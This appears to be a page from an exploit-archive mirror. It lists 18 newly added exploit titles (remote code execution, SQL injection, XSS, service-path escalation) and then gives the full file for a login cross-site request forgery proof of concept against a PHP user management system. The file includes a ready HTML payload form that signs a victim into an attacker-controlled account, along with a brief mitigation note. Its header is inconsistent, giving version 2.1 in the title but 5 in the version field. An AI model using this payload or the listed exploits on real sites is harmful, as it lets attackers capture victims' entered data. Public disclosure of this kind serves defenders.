
18 changes to exploits/shellcodes TapinRadio 2.13.7 - Denial of Service (PoC) RarmaRadio 2.72.5 - Denial of Service (PoC) Realtek Audio Service 1.0.0.55 - 'RtkAudioService64.exe' Unquoted Service Path Realtek Andrea RT Filters 1.0.64.7 - 'AERTSr64.EXE' Unquoted Service Path Rumble Mail Server 0.51.3135 - 'rumble_win32.exe' Unquoted Service Path Kite 1.2020.1119.0 - 'KiteService' Unquoted Service Path Druva inSync Windows Client 6.6.3 - Local Privilege Escalation (PowerShell) Dup Scout Enterprise 10.0.18 - 'online_registration' Remote Buffer Overflow Joomla! 1.5 < 3.4.5 - Object Injection 'x-forwarded-for' Header Remote Code Execution Joomla! 1.5 < 3.4.6 - Object Injection 'x-forwarded-for' Header Remote Code Execution Eaton Intelligent Power Manager 1.6 - Directory Traversal PandoraFMS NG747 7.0 - 'filename' Persistent Cross-Site Scripting Joomla Plugin Simple Image Gallery Extended (SIGE) 3.5.3 - Multiple Vulnerabilities Employee Record Management System 1.1 - Login Bypass SQL Injection User Registration & Login and User Management System 2.1 - Cross Site Request Forgery Cyber Cafe Management System Project (CCMS) 1.0 - Persistent Cross-Site Scripting Savsoft Quiz 5 - 'Skype ID' Stored XSS vBulletin 5.6.3 - 'group' Cross Site Scripting
32 lines
No EOL
1.2 KiB
Text
32 lines
No EOL
1.2 KiB
Text
# Exploit Title: User Registration & Login and User Management System 2.1 - Cross Site Request Forgery
|
|
# Exploit Author: Dipak Panchal(th3.d1p4k)
|
|
# Vendor Homepage: https://phpgurukul.com
|
|
# Software Link: http://user-registration-login-and-user-management-system-with-admin-panel
|
|
# Version: 5
|
|
# Tested on Windows 10
|
|
|
|
Attack Vector:
|
|
An attacker can craft HTML page containing POST information to have the
|
|
victim sign into an attacker's account, where the victim can add
|
|
information assuming he/she is logged into the correct account, where in
|
|
reality, the victim is signed into the attacker's account where the changes
|
|
are visible to the attacker.
|
|
|
|
Exploit:
|
|
|
|
<html>
|
|
<body>
|
|
<script>history.pushState('', '', '/')</script>
|
|
<form action="http://localhost/loginsystem/" method="POST">
|
|
<input type="hidden" name="uemail" value="user1@mail.com" />
|
|
<input type="hidden" name="password" value="User@1234" />
|
|
<input type="hidden" name="login" value="LOG IN" />
|
|
<input type="submit" value="Submit request" />
|
|
</form>
|
|
</body>
|
|
</html>
|
|
|
|
|
|
Mitigation:
|
|
Please add a csrf token to login request or make some type prompt that the
|
|
session has ended when the new login from attacker occurs. |